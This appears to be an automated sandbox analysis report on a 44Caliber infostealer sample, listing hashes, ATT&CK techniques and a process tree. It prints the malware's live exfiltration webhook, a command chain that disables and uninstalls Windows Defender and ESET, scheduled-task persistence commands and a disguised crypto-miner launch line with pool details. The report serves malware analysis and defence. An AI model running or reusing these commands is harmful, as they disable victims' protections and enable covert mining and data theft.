44caliber | e0166af88734a1ad71aa1dc6e18fbd4db40d5ab2177547d0091aa6202efc3c4a

Analysis

max time kernel
0s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
26-12-2023 15:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7a4520a5b7cb55ca8a4137be525703ca.exe
Size

9.5MB
MD5

7a4520a5b7cb55ca8a4137be525703ca
SHA1

307f0281d899630f6d2e7988a6570192a24b092e
SHA256

e0166af88734a1ad71aa1dc6e18fbd4db40d5ab2177547d0091aa6202efc3c4a
SHA512

e98d2a34f046f8eb4898cc6bb0820ab6655e862a31a9b4696e712994dc39d84a01af879ecedd640c0c333557b2f6639fc9dfc1930fab4f7a6a23c11641249813
SSDEEP

196608:WFSJAB+ZcpS+S6SrGTsD2dmmhGlkrwPgZS7rjsn6P44Nm0:WFS+Bkc0+Fe6dmracMR70

Score

10^/10

44caliber discovery evasion stealer

Malware Config

Extracted

Family

44caliber

https://discord.com/api/webhooks/868513655556292688/7ViWQKXofSCTi8VWoHEcGeQK61RUEBYfnsE72cu6TJnpHYwlgzbrVI5gQn_jpfUMFoS5

Signatures

44Caliber
An open source infostealer written in C#.
stealer 44caliber
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

868 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

10 freegeoip.app
11 freegeoip.app
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exe

pid process

512 sc.exe
3160 sc.exe
4696 sc.exe
1280 sc.exe
3524 sc.exe
4892 sc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1332 schtasks.exe
4444 schtasks.exe

pid	process
868	icacls.exe

flow	ioc
10	freegeoip.app
11	freegeoip.app

pid	process
512	sc.exe
3160	sc.exe
4696	sc.exe
1280	sc.exe
3524	sc.exe
4892	sc.exe

pid	process
1332	schtasks.exe
4444	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\7a4520a5b7cb55ca8a4137be525703ca.exe
"C:\Users\Admin\AppData\Local\Temp\7a4520a5b7cb55ca8a4137be525703ca.exe"
1⤵
PID:912

C:\Users\Admin\AppData\Local\Temp\InterialoaderNOP.exe
"C:\Users\Admin\AppData\Local\Temp\InterialoaderNOP.exe"
2⤵
PID:4924

C:\Users\Admin\AppData\Local\Temp\Interialoader.exe
"C:\Users\Admin\AppData\Local\Temp\Interialoader.exe"
3⤵
PID:856

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
4⤵
PID:2072

C:\Users\Admin\AppData\Local\Temp\Interia loader.exe
"C:\Users\Admin\AppData\Local\Temp\Interia loader.exe"
4⤵
PID:4684

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit
5⤵
PID:4172

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'
6⤵
- Creates scheduled task(s)
PID:1332

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
5⤵
PID:1816

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
6⤵
PID:2832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
7⤵
PID:3604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
7⤵
PID:3160

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
7⤵
PID:4880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableArchiveScanning $true
7⤵
PID:2904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
7⤵
PID:4892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
7⤵
PID:1124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableScriptScanning $true
7⤵
PID:2924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
7⤵
PID:2212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIOAVProtection $true
7⤵
PID:3124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
7⤵
PID:1136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
7⤵
PID:5012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -MAPSReporting Disabled
7⤵
PID:3124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
7⤵
PID:2904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Stop-Service WinDefend
7⤵
PID:2512

C:\Windows\system32\sc.exe
sc stop WinDefend
7⤵
- Launches sc.exe
PID:4696

C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
7⤵
- Launches sc.exe
PID:1280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-Service WinDefend -StartupType Disabled
7⤵
PID:976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
7⤵
PID:3296

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
7⤵
PID:3816

C:\Windows\system32\Dism.exe
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
7⤵
PID:3412

C:\Users\Admin\AppData\Local\Temp\27F103DB-1994-411E-B485-A0D5EE932804\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\27F103DB-1994-411E-B485-A0D5EE932804\dismhost.exe {138103B7-64C8-46EC-A0D6-3CB3F797D28C}
8⤵
PID:1948

C:\Windows\System32\Wbem\WMIC.exe
Wmic Product where name="Eset Security" call uninstall
7⤵
PID:2252

C:\Users\Admin\AppData\Roaming\Services.exe
"C:\Users\Admin\AppData\Roaming\Services.exe"
5⤵
PID:1348

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit
6⤵
PID:1084

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
6⤵
PID:3116

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
7⤵
PID:3084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
8⤵
PID:4892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
8⤵
PID:4956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
8⤵
PID:4876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
8⤵
PID:1628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableArchiveScanning $true
8⤵
PID:1084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
8⤵
PID:3168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
8⤵
PID:832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableScriptScanning $true
8⤵
PID:3312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
8⤵
PID:3108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIOAVProtection $true
8⤵
PID:2976

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6056254 --pass=in --cpu-max-threads-hint=40 --donate-level=5 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
6⤵
PID:4264

C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe
"C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe"
3⤵
PID:1940

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe" org.develnext.jphp.ext.javafx.FXLauncher
4⤵
PID:3700

C:\Windows\system32\icacls.exe
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
5⤵
- Modifies file permissions
PID:868

C:\Users\Admin\AppData\Local\Temp\Config.exe
"C:\Users\Admin\AppData\Local\Temp\Config.exe"
2⤵
PID:2984

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
1⤵
PID:2084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
2⤵
PID:4844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
2⤵
PID:4032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
2⤵
PID:3684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
2⤵
PID:3116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableArchiveScanning $true
2⤵
PID:3752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
2⤵
PID:1240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
PID:2892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableScriptScanning $true
2⤵
PID:4904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
2⤵
PID:744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIOAVProtection $true
2⤵
PID:3024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
2⤵
PID:4436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
2⤵
PID:868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -MAPSReporting Disabled
2⤵
PID:1788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
2⤵
PID:4472

C:\Windows\system32\sc.exe
sc stop WinDefend
2⤵
- Launches sc.exe
PID:512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Stop-Service WinDefend
2⤵
PID:1352

C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
2⤵
- Launches sc.exe
PID:3160

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-Service WinDefend -StartupType Disabled
2⤵
PID:5108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
2⤵
PID:2668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
2⤵
PID:3864

C:\Windows\system32\Dism.exe
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
2⤵
PID:4956

C:\Users\Admin\AppData\Local\Temp\E9D4E65E-03D9-4F4A-AC09-F37827C99118\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\E9D4E65E-03D9-4F4A-AC09-F37827C99118\dismhost.exe {65001853-7DEB-417E-B29A-B74D0C07753F}
3⤵
PID:4264

C:\Windows\System32\Wbem\WMIC.exe
Wmic Product where name="Eset Security" call uninstall
2⤵
PID:3500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
1⤵
PID:4228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
1⤵
PID:3332

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
1⤵
PID:1904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
2⤵
PID:4796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
2⤵
PID:4372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
2⤵
PID:3008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableArchiveScanning $true
2⤵
PID:3312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
2⤵
PID:3524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
PID:3784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableScriptScanning $true
2⤵
PID:2444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
2⤵
PID:4468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIOAVProtection $true
2⤵
PID:2808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
2⤵
PID:1240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
2⤵
PID:3152

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -MAPSReporting Disabled
2⤵
PID:1588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
2⤵
PID:2736

C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
2⤵
- Launches sc.exe
PID:3524

C:\Windows\system32\sc.exe
sc stop WinDefend
2⤵
- Launches sc.exe
PID:4892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Stop-Service WinDefend
2⤵
PID:4348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-Service WinDefend -StartupType Disabled
2⤵
PID:2764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
2⤵
PID:4088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
2⤵
PID:3552

C:\Windows\system32\Dism.exe
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
2⤵
PID:2840

C:\Users\Admin\AppData\Local\Temp\8BA2441D-50BB-4F2C-B5DF-3DBBDB66D98C\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\8BA2441D-50BB-4F2C-B5DF-3DBBDB66D98C\dismhost.exe {797A21DA-945E-4A5F-AC9F-903D20DBA121}
3⤵
PID:2460

C:\Windows\System32\Wbem\WMIC.exe
Wmic Product where name="Eset Security" call uninstall
2⤵
PID:3504

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:5028

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'
1⤵
- Creates scheduled task(s)
PID:4444

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Config.exe

Filesize
92KB

MD5
32bad02ebf8128142edb4819ec487761

SHA1
601db9834c48d6556c3c0912ac9d61ebbf3a537a

SHA256
c51620a67b1cb70c669ee4e66937d405ed47bd527ea52dd0cf71c2dcadd87533

SHA512
a77f8cea54bcc8d0deb798c54b13a99e1724218bad44878c891c847b086e0bb44850edf4bd876f8f30a10badf33a6aadb9361fdabd78671639cbb27c91d1e635

Download Submit
C:\Users\Admin\AppData\Local\Temp\Config.exe

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Interialoader.exe

Filesize
128KB

MD5
2276bf9faf36cd9b58063bf64eb76e36

SHA1
98f7f4cdfae7b6375b92d41d512e4538a03131b4

SHA256
88eec8f2f7c717a10c8c857b4fddc9e074e83b46f53f634c85d01426dd9971b1

SHA512
e064106d250f96f7e63679effa911c9ab8a008b344adabe2f5db52179f3842fab8865bf01f44856bafd7d01f27ef3286164a69911c9b30f6effe929b39cc9ac5

Download Submit
C:\Users\Admin\AppData\Local\Temp\InterialoaderNOP.exe

Filesize
382KB

MD5
b5ed49b34b65d64cac63dc11444732f2

SHA1
448dbf83118577509f7efde00f550083ff069161

SHA256
271e7d8a6a44260b8f3b19dc947697cfc03b07ab0063e47e5594c73b919a2e1c

SHA512
5eed00cdb1e039326dc43f3d92854f6e05b9a81cb6e376082bed8b931f68b758be9183f966734ca8fc650c9224bd532d51eabd9957ea667b21b6ca4d47e62f1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\InterialoaderNOP.exe

Filesize
381KB

MD5
03110e491cc58625d28e943131e618de

SHA1
e0b9c349d90575e5b974fdf6ccf76e842a27b97f

SHA256
10b813eb1bcd455f2245710598f5b41ef79148a163f950403e87246ef44f40da

SHA512
311f5fdad8627c18abaa08e26817b152c7a0aadde0b4e557ccfef3221ff56495b6c4c3f40aaee81a34ace449da7832e80f7ae0946ff70f4e698f9f37eceb9963

Download Submit
memory/744-386-0x000001D175F90000-0x000001D175FA0000-memory.dmp

Filesize
64KB

Download
memory/744-387-0x000001D175F90000-0x000001D175FA0000-memory.dmp

Filesize
64KB

Download
memory/744-385-0x00007FFFDEC50000-0x00007FFFDF711000-memory.dmp

Filesize
10.8MB

Download
memory/856-45-0x0000000001140000-0x0000000001150000-memory.dmp

Filesize
64KB

Download
memory/856-43-0x0000000000710000-0x0000000000960000-memory.dmp

Filesize
2.3MB

Download
memory/856-44-0x00007FFFDEC50000-0x00007FFFDF711000-memory.dmp

Filesize
10.8MB

Download
memory/856-89-0x00007FFFDEC50000-0x00007FFFDF711000-memory.dmp

Filesize
10.8MB

Download
memory/912-2-0x000000001BB80000-0x000000001BB90000-memory.dmp

Filesize
64KB

Download
memory/912-1-0x00007FFFDEC50000-0x00007FFFDF711000-memory.dmp

Filesize
10.8MB

Download
memory/912-0-0x0000000000510000-0x0000000000E94000-memory.dmp

Filesize
9.5MB

Download
memory/912-26-0x00007FFFDEC50000-0x00007FFFDF711000-memory.dmp

Filesize
10.8MB

Download
memory/1240-246-0x00007FFFDEC50000-0x00007FFFDF711000-memory.dmp

Filesize
10.8MB

Download
memory/1240-248-0x000001E6713A0000-0x000001E6713B0000-memory.dmp

Filesize
64KB

Download
memory/1240-252-0x00007FFFDEC50000-0x00007FFFDF711000-memory.dmp

Filesize
10.8MB

Download
memory/1240-247-0x000001E6713A0000-0x000001E6713B0000-memory.dmp

Filesize
64KB

Download
memory/1940-78-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/2072-85-0x0000000000CC0000-0x0000000000D0A000-memory.dmp

Filesize
296KB

Download
memory/2072-129-0x000000001B8D0000-0x000000001B8E0000-memory.dmp

Filesize
64KB

Download
memory/2072-90-0x00007FFFDEC50000-0x00007FFFDF711000-memory.dmp

Filesize
10.8MB

Download
memory/2072-249-0x000000001B8D0000-0x000000001B8E0000-memory.dmp

Filesize
64KB

Download
memory/2072-230-0x00007FFFDEC50000-0x00007FFFDF711000-memory.dmp

Filesize
10.8MB

Download
memory/2892-259-0x00007FFFDEC50000-0x00007FFFDF711000-memory.dmp

Filesize
10.8MB

Download
memory/2892-263-0x00000220BCE70000-0x00000220BCE80000-memory.dmp

Filesize
64KB

Download
memory/2892-267-0x00007FFFDEC50000-0x00007FFFDF711000-memory.dmp

Filesize
10.8MB

Download
memory/3116-218-0x00007FFFDEC50000-0x00007FFFDF711000-memory.dmp

Filesize
10.8MB

Download
memory/3116-216-0x00007FFFDEC50000-0x00007FFFDF711000-memory.dmp

Filesize
10.8MB

Download
memory/3684-202-0x00007FFFDEC50000-0x00007FFFDF711000-memory.dmp

Filesize
10.8MB

Download
memory/3684-203-0x0000029DFEE70000-0x0000029DFEE80000-memory.dmp

Filesize
64KB

Download
memory/3684-205-0x00007FFFDEC50000-0x00007FFFDF711000-memory.dmp

Filesize
10.8MB

Download
memory/3700-160-0x0000027D80000000-0x0000027D81000000-memory.dmp

Filesize
16.0MB

Download
memory/3700-171-0x0000027D802D0000-0x0000027D802E0000-memory.dmp

Filesize
64KB

Download
memory/3700-186-0x0000027D80300000-0x0000027D80310000-memory.dmp

Filesize
64KB

Download
memory/3700-185-0x0000027D80000000-0x0000027D81000000-memory.dmp

Filesize
16.0MB

Download
memory/3700-118-0x0000027D80000000-0x0000027D81000000-memory.dmp

Filesize
16.0MB

Download
memory/3700-184-0x0000027D802F0000-0x0000027D80300000-memory.dmp

Filesize
64KB

Download
memory/3700-187-0x0000027D80310000-0x0000027D80320000-memory.dmp

Filesize
64KB

Download
memory/3700-173-0x0000027D802E0000-0x0000027D802F0000-memory.dmp

Filesize
64KB

Download
memory/3700-142-0x0000027DF7250000-0x0000027DF7251000-memory.dmp

Filesize
4KB

Download
